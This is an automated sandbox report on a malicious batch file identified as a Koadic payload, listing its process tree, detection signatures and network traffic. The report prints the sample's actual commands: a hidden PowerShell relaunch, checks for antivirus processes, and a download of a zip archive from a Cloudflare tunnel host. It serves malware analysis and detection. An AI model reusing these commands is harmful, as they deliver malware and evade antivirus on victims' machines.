Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yap.bat

Overview

General Information

Sample name:yap.bat
Analysis ID:1663711
MD5:577d022599897eeef1e94a76ce61c4ac
SHA1:972b1de7f05f8737c93784524d6a918a89c5ee99
SHA256:a55a9a2336b9406cf4ddd3c29ec3c393f3810efe3e92658dce1de61da6d9a2f0
Tags:batWsgiDAVuser-JAMESWT_WT
Infos:

Detection

Koadic
Score:76
Range:0 - 100
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Suspicious powershell command line found
Yara detected JavaScript embedded in SVG
Yara detected Koadic BAT payload
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
DNS query to tunneling platform domain
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6976 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\yap.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7108 cmdline: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\yap.bat\" hidden' -WindowStyle Hidden" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 2944 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\yap.bat" hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Acrobat.exe (PID: 2236 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\YPSIACHYXW.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
          • AcroCEF.exe (PID: 344 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
            • AcroCEF.exe (PID: 7392 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1568,i,3081941811078344986,2843059504850167928,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • timeout.exe (PID: 3672 cmdline: timeout /t 5 REM Wait for PDF to open (adjust timeout as needed) MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • tasklist.exe (PID: 6340 cmdline: tasklist /FI "IMAGENAME eq AvastUI.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • find.exe (PID: 6248 cmdline: find /i "AvastUI.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
        • tasklist.exe (PID: 7152 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • find.exe (PID: 6120 cmdline: find /i "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
        • powershell.exe (PID: 3816 cmdline: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 1372 cmdline: powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
KoadicKoadic is an open-source post-exploitation framework for Windows, created by zerosum0x0 and available on GitHub. The framework is written in Python and can generate JScript and VBScript payloads which can be written to disk or mapped directly into memory. Its capabilities include remote desktop access, command execution, lateral movement via SMB, file transfer, credential theft using Mimikatz, port scanning, and system information collection. It can also collect specific system information and targeted files based on their name or extension.
  • APT28
  • Stone Panda
https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic
No configs have been found
SourceRuleDescriptionAuthorStrings
yap.batJoeSecurity_KoadicBATpayloadYara detected Koadic BAT payloadJoe Security
    yap.batMALWARE_BAT_KoadicBATKoadic post-exploitation framework BAT payloadditekSHen
    • 0x2:$s1: &@cls&@set
    • 0x5e:$s2: :~30,1%%
    • 0x6a:$s2: :~44,1%%
    • 0x76:$s2: :~9,1%
    • 0x83:$s2: :~58,1%%
    • 0x8f:$s2: :~14,1%%
    • 0x9b:$s2: :~30,1%%
    • 0xa7:$s2: :~52,1%%
    • 0xb3:$s2: :~39,1%%
    • 0xbf:$s2: :~12,1%%
    • 0xcb:$s2: :~39,1%%
    • 0xd7:$s2: :~25,1%%
    • 0xe3:$s2: :~25,1%
    • 0xf3:$s2: :~12,1%%
    • 0xff:$s2: :~13,1%%
    • 0x10b:$s2: :~14,1%%
    • 0x117:$s2: :~44,1%%
    • 0x123:$s2: :~34,1%%
    • 0x12f:$s2: :~7,1%%
    • 0x13a:$s2: :~4,1%%
    • 0x145:$s2: :~30,1%%
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Downloads\Extracted\Python\Python312\Doc\html\tutorial\floatingpoint.htmlJoeSecurity_JavaScriptembeddedinSVGYara detected JavaScript embedded in SVGJoe Security
      C:\Users\user\Downloads\Extracted\Python\Python312\Doc\html\reference\executionmodel.htmlJoeSecurity_JavaScriptembeddedinSVGYara detected JavaScript embedded in SVGJoe Security
        C:\Users\user\Downloads\Extracted\Python\Python312\Doc\html\reference\toplevel_components.htmlJoeSecurity_JavaScriptembeddedinSVGYara detected JavaScript embedded in SVGJoe Security
          SourceRuleDescriptionAuthorStrings
          00000005.00000003.1243785632.0000023995B58000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_KoadicBATpayloadYara detected Koadic BAT payloadJoe Security
            00000005.00000002.2455424741.0000023995AE0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_KoadicBATpayloadYara detected Koadic BAT payloadJoe Security
              Process Memory Space: cmd.exe PID: 2944JoeSecurity_KoadicBATpayloadYara detected Koadic BAT payloadJoe Security

                System Summary

                barindex
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1372, TargetFilename: C:\Users\user\Downloads\Extracted\Python\Launcher\py.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\yap.bat" hidden , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2944, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", ProcessId: 3816, ProcessName: powershell.exe
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\yap.bat" hidden , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2944, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", ProcessId: 3816, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\yap.bat\" hidden' -WindowStyle Hidden", CommandLine: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\yap.bat\" hidden' -WindowStyle Hidden", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\yap.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6976, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\yap.bat\" hidden' -WindowStyle Hidden", ProcessId: 7108, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-04-12T08:41:31.607782+020018100002Potentially Bad Traffic192.168.2.649687104.16.231.132443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: yap.batVirustotal: Detection: 13%Perma Link
                Source: yap.batReversingLabs: Detection: 16%
                Source: Submited SampleNeural Call Log Analysis: 98.6%

                Phishing

                barindex
                Source: Yara matchFile source: C:\Users\user\Downloads\Extracted\Python\Python312\Doc\html\tutorial\floatingpoint.html, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\Downloads\Extracted\Python\Python312\Doc\html\reference\executionmodel.html, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\Downloads\Extracted\Python\Python312\Doc\html\reference\toplevel_components.html, type: DROPPED
                Source: unknownHTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.6:49687 version: TLS 1.2
                Source: Binary string: <p>The <a class="reference internal" href="../library/pdb.html#pdb.Pdb" title="pdb.Pdb"><code class="xref py py-class docutils literal notranslate"><span class="pre">Pdb</span></code></a> class constructor has a new optional <em>readrc</em> argument source: 3.6.html.24.dr
                Source: Binary string: <td><p>Install debugging symbols (<code class="docutils literal notranslate"><span class="pre">*.pdb</span></code>)</p></td> source: windows.html2.24.dr
                Source: Binary string: <li><a href="library/pdb.html#pdb.Pdb.run">(pdb.Pdb method)</a> source: genindex-all.html.24.dr
                Source: Binary string: .pdbrc source: genindex-all.html.24.dr
                Source: Binary string: <li><a href="library/pdb.html#index-1">Pdb (class in pdb)</a>, <a href="library/pdb.html#pdb.Pdb">[1]</a> source: genindex-all.html.24.dr
                Source: Binary string: <li><a href="library/pdb.html#pdb.Pdb.set_trace">(pdb.Pdb method)</a> source: genindex-all.html.24.dr
                Source: Binary string: <li><a href="library/pdb.html#pdb.Pdb.runeval">(pdb.Pdb method)</a> source: genindex-all.html.24.dr
                Source: Binary string: <p>On Windows now <a class="reference internal" href="../library/pdb.html#pdb.Pdb" title="pdb.Pdb"><code class="xref py py-class docutils literal notranslate"><span class="pre">Pdb</span></code></a> supports <code class="docutils literal notranslate"><span class="pre">~/.pdbrc</span></code>. source: 3.9.html.24.dr
                Source: Binary string: <li><a href="library/pdb.html#pdb.Pdb.runcall">(pdb.Pdb method)</a> source: genindex-all.html.24.dr
                Source: Binary string: <li><a href="library/pdb.html#index-2">.pdbrc</a> source: genindex-all.html.24.dr
                Source: Binary string: to control whether <code class="docutils literal notranslate"><span class="pre">.pdbrc</span></code> files should be read.</p> source: 3.6.html.24.dr
                Source: unknownDNS query to tunneling platform domain: name: german-tan-exotic-collectibles.trycloudflare.com
                Source: Joe Sandbox ViewIP Address: 104.16.231.132 104.16.231.132
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49687 -> 104.16.231.132:443
                Source: global trafficHTTP traffic detected: GET /bab.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: german-tan-exotic-collectibles.trycloudflare.comConnection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /bab.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: german-tan-exotic-collectibles.trycloudflare.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: x1.i.lencr.org
                Source: 2.6.html.24.drString found in binary or memory: <span class="k">with</span> <span class="n">closing</span><span class="p">(</span><span class="n">urllib</span><span class="o">.</span><span class="n">urlopen</span><span class="p">(</span><span class="s1">&#39;http://www.yahoo.com&#39;</span><span class="p">))</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: german-tan-exotic-collectibles.trycloudflare.com
                Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
                Source: xmlrpc.client.html.24.drString found in binary or memory: http://betty.userland.com&#39;
                Source: xmlrpc.client.html.24.drString found in binary or memory: http://betty.userland.com&quot;
                Source: xml.etree.elementtree.html.24.drString found in binary or memory: http://example.org/&quot;
                Source: terminal256.cpython-312.pyc.24.drString found in binary or memory: http://frexx.de/xterm-256-notes/data/xterm256-conv2.tar.bz2)
                Source: xmlrpc.client.html.24.drString found in binary or memory: http://google.com/&quot;
                Source: constants.py.24.dr, sslproto.py.24.drString found in binary or memory: http://magic.io
                Source: powershell.exe, 0000000D.00000002.1819134442.00000242B4732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1819134442.00000242B45EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: xmlrpc.client.html.24.drString found in binary or memory: http://ontosys.com/xml-rpc/extensions.php
                Source: powershell.exe, 0000000D.00000002.1774446533.00000242A47A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1823076447.00000242BC750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 0000000D.00000002.1774446533.00000242A4581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: 2.4.html.24.dr, _pydecimal.py.24.drString found in binary or memory: http://speleotrove.com/decimal/
                Source: powershell.exe, 0000000D.00000002.1774446533.00000242A47A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1823076447.00000242BC750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: 2.4.html.24.drString found in binary or memory: http://www.lahey.com/float.htm
                Source: 2D85F72862B55C4EADD9E66E06947F3D0.14.drString found in binary or memory: http://x1.i.lencr.org/
                Source: xmlrpc.client.html.24.drString found in binary or memory: http://xmlrpc.scripting.com/spec.html
                Source: powershell.exe, 0000000D.00000002.1774446533.00000242A4581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: android.py.24.drString found in binary or memory: https://android.stackexchange.com/a/216132
                Source: git.py.24.drString found in binary or memory: https://article.gmane.org/gmane.comp.version-control.git/146500)
                Source: pythread.h.24.drString found in binary or memory: https://bugs.python.org/issue31370
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10049
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10076
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10379
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10381
                Source: 3.7.html.24.dr, 3.8.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10544
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=11549
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=11822
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=11913
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1198569
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=12844
                Source: 3.7.html.24.dr, 3.6.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=13802
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=14191
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=14976
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15216
                Source: 3.7.html.24.dr, 3.6.html.24.dr, 3.8.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1529353
                Source: 3.7.html.24.dr, 3.6.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15786
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1580
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15873
                Source: 3.7.html.24.dr, 3.6.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1612262
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16285
                Source: 3.4.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16475
                Source: 3.4.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16499
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=16500
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1655
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1664
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1696199
                Source: 3.1.html.24.dr, 2.6.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1739468
                Source: 3.7.html.24.dr, 3.8.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17535
                Source: 3.1.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1818
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18896
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18966
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=19764
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=19930
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=20361
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=20486
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=20804
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=20825
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=20995
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=21071
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=21417
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=21423
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=21862
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=22257
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=22589
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=22807
                Source: 3.7.html.24.dr, 3.6.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=22898
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=23033
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=23699
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=23749
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=23835
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=24700
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=24744
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=24821
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=25054
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=25612
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=25658
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=25942
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=25988
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=25996
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=26110
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=26121
                Source: 3.7.html.24.dr, 3.6.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=26273
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=26510
                Source: 3.7.html.24.dr, 3.6.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=27099
                Source: 3.7.html.24.dr, 3.6.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=27456
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=27584
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=27645
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=27867
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=27979
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28124
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28134
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28137
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28280
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28292
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28332
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28411
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28414
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28564
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28638
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28682
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28685
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28692
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28707
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28740
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28761
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28769
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28799
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28822
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28847
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28894
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28927
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28974
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29102
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29136
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29137
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29192
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29193
                Source: 3.7.html.24.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29218
